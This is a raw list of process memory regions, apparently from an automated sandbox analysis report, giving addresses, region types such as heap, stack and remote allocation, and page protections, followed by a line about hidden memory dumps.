page readonly
7843000
heap
page read and write
421000
unkown
page readonly
2AA0000
trusted library section
page read and write
4281000
heap
page read and write
6D78000
heap
page read and write
4281000
heap
page read and write
C50000
heap
page read and write
474E000
stack
page read and write
72FE000
stack
page read and write
2D88000
heap
page read and write
1680C851000
trusted library allocation
page read and write
4281000
heap
page read and write
7FF848EBC000
trusted library allocation
page execute and read and write
2A5F27B000
stack
page read and write
7FF848FB1000
trusted library allocation
page read and write
4757000
heap
page read and write
2DBD000
heap
page read and write
2CC8000
trusted library allocation
page read and write
29E0000
heap
page read and write
23C10DD0000
trusted library allocation
page read and write
2DBC000
heap
page read and write
578000
stack
page read and write
430000
heap
page read and write
1680E5AD000
trusted library allocation
page read and write
1DF040E5000
heap
page read and write
1681C860000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
7A6000
heap
page read and write
72BE000
stack
page read and write
4281000
heap
page read and write
7120000
trusted library allocation
page read and write
7FF848FE2000
trusted library allocation
page read and write
2A2C000
stack
page read and write
23312000
heap
page read and write
7DEE000
stack
page read and write
943F000
stack
page read and write
4281000
heap
page read and write
4AF000
stack
page read and write
4B0000
heap
page read and write
4281000
heap
page read and write
2A9D000
heap
page read and write
100000
direct allocation
page read and write
443C000
heap
page read and write
4A5C000
unclassified section
page read and write
78AD000
heap
page read and write
633000
heap
page read and write
8440000
trusted library allocation
page read and write
C30000
unkown
page readonly
780000
heap
page read and write
471D000
direct allocation
page execute and read and write
7FF849160000
trusted library allocation
page read and write
2A5EDFD000
stack
page read and write
29C0000
heap
page read and write
340B000
unkown
page execute and read and write
4281000
heap
page read and write
1680D034000
trusted library allocation
page read and write
2319C000
stack
page read and write
980000
unkown
page readonly
16824A10000
heap
page execute and read and write
1D0000
unkown
page readonly
1680A66A000
heap
page read and write
7FF848E04000
trusted library allocation
page read and write
2A5FD4A000
stack
page read and write
48C1000
direct allocation
page execute and read and write
7420000
trusted library allocation
page read and write
2A9B000
remote allocation
page execute and read and write
2A5EBFE000
stack
page read and write
E30000
heap
page read and write
2AEA000
heap
page read and write
9370000
direct allocation
page read and write
73F0000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
23C10F00000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
8000000
trusted library allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
1F0000
unkown
page readonly
4281000
heap
page read and write
2A5EA7E000
stack
page read and write
63E000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
2AD4000
trusted library allocation
page read and write
1680D02F000
trusted library allocation
page read and write
4281000
heap
page read and write
489B000
remote allocation
page execute and read and write
4430000
trusted library allocation
page execute and read and write
3F4000
heap
page read and write
7450000
trusted library allocation
page read and write
400000
heap
page read and write
C80000
unkown
page readonly
4281000
heap
page read and write
45D0000
heap
page execute and read and write
2D0E000
stack
page read and write
7FF848E00000
trusted library allocation
page read and write
4281000
heap
page read and write
2BC8000
heap
page read and write
2352E000
heap
page read and write
9440000
heap
page read and write
29BF000
stack
page read and write
4281000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
C8E000
unkown
page readonly
9EA000
stack
page read and write
230CE000
stack
page read and write
1680A722000
heap
page read and write
2A20000
heap
page read and write
6B20000
direct allocation
page read and write
520000
heap
page read and write
4281000
heap
page read and write
7DF43C710000
trusted library allocation
page execute and read and write
7930000
trusted library allocation
page read and write
4281000
heap
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
C71000
unkown
page readonly
652000
heap
page read and write
9330000
direct allocation
page read and write
1E0000
heap
page read and write
3F4000
heap
page read and write
B2610FD000
stack
page read and write
22EDD000
stack
page read and write
2AC0000
heap
page read and write
2366D000
direct allocation
page execute and read and write
451E000
stack
page read and write
7F3E000
stack
page read and write
2AAF000
stack
page read and write
D6D35FF000
stack
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
642000
heap
page read and write
2A56000
heap
page read and write
2D40000
heap
page read and write
786A000
heap
page read and write
2FAC000
unkown
page read and write
22B4000
heap
page read and write
2C3E000
stack
page read and write
7490000
trusted library allocation
page read and write
46C7000
heap
page read and write
4281000
heap
page read and write
7942000
heap
page read and write
45DA000
heap
page read and write
4732000
trusted library allocation
page read and write
78C9000
heap
page read and write
BE0000
heap
page read and write
4281000
heap
page read and write
AB7B000
direct allocation
page execute and read and write
D37B000
direct allocation
page execute and read and write
7DB000
stack
page read and write
64A000
heap
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
22B4000
heap
page read and write
1680C6F2000
heap
page read and write
23C11000000
trusted library allocation
page read and write
4281000
heap
page read and write
29D0000
heap
page read and write
4281000
heap
page read and write
2A5E785000
stack
page read and write
45F0000
direct allocation
page execute and read and write
597C000
trusted library allocation
page read and write
C81000
unkown
page execute read
2A8B000
heap
page read and write
299E000
stack
page read and write
6BD0000
heap
page execute and read and write
2A4E000
stack
page read and write
2AC0000
heap
page read and write
2AB0000
heap
page read and write
C80000
unkown
page readonly
2C02000
trusted library allocation
page read and write
8C10000
direct allocation
page execute and read and write
1680D022000
trusted library allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
980000
unkown
page readonly
21C0000
unkown
page readonly
81E7000
heap
page read and write
231E0000
heap
page read and write
2A68000
heap
page read and write
4942000
unclassified section
page read and write
7107000
trusted library allocation
page read and write
4281000
heap
page read and write
8D7B000
direct allocation
page execute and read and write
E30000
heap
page read and write
4281000
heap
page read and write
29E0000
heap
page read and write
29DE000
stack
page read and write
F30000
heap
page read and write
349B000
remote allocation
page execute and read and write
29D0000
unkown
page read and write
6F8E000
stack
page read and write
4281000
heap
page read and write
840000
heap
page read and write
4281000
heap
page read and write
476F000
stack
page read and write
C40000
unkown
page readonly
C95000
unkown
page read and write
479F000
stack
page read and write
8490000
direct allocation
page read and write
29F7000
heap
page read and write
B40000
unkown
page readonly
25DDB000
unclassified section
page execute and read and write
234B9000
heap
page read and write
2D50000
heap
page read and write
6B00000
direct allocation
page read and write
236DE000
direct allocation
page execute and read and write
73A0000
heap
page read and write
23C10D90000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
7100000
trusted library allocation
page read and write
2DB6000
heap
page read and write
7F340000
trusted library allocation
page execute and read and write
4281000
heap
page read and write
7E70000
trusted library allocation
page execute and read and write
2A5F0FE000
stack
page read and write
2A5EB7D000
stack
page read and write
4281000
heap
page read and write
6B50000
direct allocation
page read and write
2D2C000
stack
page read and write
4281000
heap
page read and write
378000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
1680CCC2000
trusted library allocation
page read and write
1680C032000
trusted library allocation
page read and write
4281000
heap
page read and write
234BD000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
719E000
heap
page read and write
2DA7000
heap
page read and write
2A6E000
stack
page read and write
C95000
unkown
page read and write
2AA4000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
7856000
heap
page read and write
4281000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
717F000
heap
page read and write
2DB6000
heap
page read and write
78A4000
heap
page read and write
19C000
stack
page read and write
81D3000
heap
page read and write
2BFA000
trusted library allocation
page execute and read and write
4281000
heap
page read and write
4281000
heap
page read and write
64A000
heap
page read and write
4281000
heap
page read and write
2C05000
trusted library allocation
page execute and read and write
2A90000
heap
page read and write
2A6F000
heap
page read and write
10000
unkown
page readonly
2B6A000
heap
page read and write
4281000
heap
page read and write
140000
direct allocation
page read and write
1680D03D000
trusted library allocation
page read and write
1680CF46000
trusted library allocation
page read and write
48BD000
direct allocation
page execute and read and write
2AD0000
unkown
page readonly
2A5F17F000
stack
page read and write
4281000
heap
page read and write
D6D2DFE000
stack
page read and write
960000
unkown
page readonly
23070000
heap
page read and write
2D4E000
stack
page read and write
1680C650000
heap
page read and write
2AA7000
heap
page read and write
4281000
heap
page read and write
93A0000
direct allocation
page read and write
2A90000
heap
page read and write
1680A74C000
heap
page read and write
1DF03FB0000
heap
page read and write
22F9B000
stack
page read and write
7860000
heap
page read and write
1681CB3B000
trusted library allocation
page read and write
23C0F4C9000
heap
page read and write
29E8000
heap
page read and write
2A8B000
heap
page read and write
4281000
heap
page read and write
CB1000
unkown
page readonly
4C1C000
unclassified section
page read and write
4281000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
1680C120000
heap
page read and write
7F50000
trusted library allocation
page execute and read and write
2A02000
heap
page read and write
54DF000
stack
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
454C000
stack
page read and write
56D1000
trusted library allocation
page read and write
7E90000
trusted library allocation
page read and write
4281000
heap
page read and write
2A53000
heap
page read and write
7FF848FBA000
trusted library allocation
page read and write
6FE1000
heap
page read and write
4281000
heap
page read and write
DAC000
stack
page read and write
1680A640000
heap
page read and write
4281000
heap
page read and write
F312000
system
page read and write
7FF848E10000
trusted library allocation
page read and write
4281000
heap
page read and write
2CC4000
heap
page read and write
7460000
trusted library allocation
page read and write
23C10F0C000
trusted library allocation
page read and write
4281000
heap
page read and write
3F4000
heap
page read and write
7FD5000
trusted library allocation
page read and write
2A0B000
unkown
page execute and read and write
9390000
direct allocation
page read and write
CB1000
unkown
page readonly
4280000
heap
page read and write
7A9B000
remote allocation
page execute and read and write
798000
stack
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
7440000
trusted library allocation
page read and write
2ACE000
heap
page read and write
4281000
heap
page read and write
F10000
unkown
page read and write
7480000
trusted library allocation
page read and write
48B0000
heap
page read and write
7FF848E02000
trusted library allocation
page read and write
23C110CE000
trusted library allocation
page read and write
4281000
heap
page read and write
1680C660000
heap
page read and write
7110000
trusted library allocation
page read and write
2A9D000
heap
page read and write
46C0000
heap
page read and write
56F9000
trusted library allocation
page read and write
1680C478000
heap
page read and write
4281000
heap
page read and write
1680C6AA000
heap
page read and write
2DB1000
heap
page read and write
47B0000
heap
page read and write
9300000
direct allocation
page read and write
1681C851000
trusted library allocation
page read and write
1680A7F0000
trusted library allocation
page read and write
29C7000
heap
page read and write
2C6E000
stack
page read and write
23C10F0F000
trusted library allocation
page read and write
7858000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
2920000
heap
page read and write
2DEC000
unkown
page read and write
485E000
stack
page read and write
A17B000
direct allocation
page execute and read and write
4281000
heap
page read and write
1680D006000
trusted library allocation
page read and write
1680C590000
heap
page execute and read and write
140000
direct allocation
page read and write
78A7000
heap
page read and write
B60000
unkown
page read and write
92E0000
heap
page readonly
4281000
heap
page read and write
4281000
heap
page read and write
675000
heap
page read and write
2C20000
trusted library allocation
page read and write
784C000
heap
page read and write
6A0000
heap
page read and write
78C3000
heap
page read and write
2ADD000
trusted library allocation
page execute and read and write
72E000
stack
page read and write
23C0F490000
heap
page read and write
1680A74A000
heap
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
16824A92000
heap
page read and write
C80000
unkown
page readonly
46D000
stack
page read and write
4281000
heap
page read and write
1D0000
unkown
page readonly
7DAF000
stack
page read and write
28E0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
29CF000
unkown
page read and write
7FF849110000
trusted library allocation
page read and write
6AA0000
direct allocation
page read and write
2310F000
stack
page read and write
6AC0000
direct allocation
page read and write
4281000
heap
page read and write
400000
heap
page read and write
23C0F4F3000
heap
page read and write
4281000
heap
page read and write
23540000
direct allocation
page execute and read and write
4932000
direct allocation
page execute and read and write
19C000
stack
page read and write
4281000
heap
page read and write
10A4000
system
page execute and read and write
4DDE000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
C95000
unkown
page read and write
23C0F3F8000
system
page execute and read and write
47E4000
heap
page read and write
4281000
heap
page read and write
2A02000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
9380000
direct allocation
page read and write
4281000
heap
page read and write
283E000
stack
page read and write
733E000
stack
page read and write
3F4000
heap
page read and write
4281000
heap
page read and write
93FE000
stack
page read and write
22B0000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
7832000
heap
page read and write
4281000
heap
page read and write
25FE000
stack
page read and write
2B1D000
heap
page read and write
7886000
heap
page read and write
23C0F4EC000
heap
page read and write
662000
heap
page read and write
F3D2000
system
page read and write
D6D1DFC000
stack
page read and write
2B10000
heap
page read and write
7140000
trusted library allocation
page read and write
2AD0000
unkown
page readonly
510000
unkown
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
1E0000
unkown
page readonly
1680C124000
heap
page read and write
E36000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
5C9B000
remote allocation
page execute and read and write
7260000
heap
page execute and read and write
C8E000
unkown
page readonly
B2611FE000
unkown
page read and write
81C6000
heap
page read and write
C8E000
unkown
page readonly
65B000
heap
page read and write
6AD0000
direct allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
C81000
unkown
page execute read
4281000
heap
page read and write
23C11001000
trusted library allocation
page read and write
2A65000
heap
page read and write
4DC6000
trusted library allocation
page read and write
4281000
heap
page read and write
1DF03DA0000
heap
page read and write
3F4000
heap
page read and write
4281000
heap
page read and write
28E0000
trusted library allocation
page read and write
4281000
heap
page read and write
4281000
heap
page read and write
4750000
heap
page read and write
4281000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
2DAA000
heap
page read and write
2FAC000
unkown
page read and write
7FF8490E0000
trusted library allocation
page read and write
46A0000
heap
page read and write
4281000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
1DF03F90000
heap
page read and write
2CCE000
unkown
page read and write
4281000
heap
page read and write
2A68000
heap
page read and write
2A5E7CF000
stack
page read and write
2DD6000
heap
page read and write
2840000
trusted library allocation
page read and write
816E000
stack
page read and write
1098000
system
page execute and read and write
C97000
unkown
page readonly
4281000
heap
page read and write
23C0F3F5000
system
page execute and read and write
2A7E000
stack
page read and write
23C10DD0000
trusted library allocation
page read and write
55E000
heap
page read and write
29F9000
heap
page read and write
4281000
heap
page read and write
1680D018000
trusted library allocation
page read and write
1E0000
unkown
page readonly
4281000
heap
page read and write
794A000
heap
page read and write
1F0000
heap
page read and write
2DB9000
heap
page read and write
45CE000
stack
page read and write
4281000
heap
page read and write
71D1000
heap
page read and write
4281000
heap
page read and write
528000
heap
page read and write
14C1000
unkown
page readonly
2D98000
heap
page read and write
23C10F17000
trusted library allocation
page read and write
1680A5B0000
heap
page read and write
2A9A000
heap
page read and write
23C10F21000
trusted library allocation
page read and write
1680C030000
trusted library allocation
page read and write
48B4000
heap
page read and write
2DB3000
heap
page read and write
3F0000
heap
page read and write
78B9000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
23FDB000
unclassified section
page execute and read and write
2DBB000
heap
page read and write
23C110B0000
trusted library allocation
page read and write
4281000
heap
page read and write
There are 957 hidden memdumps, click here to show them.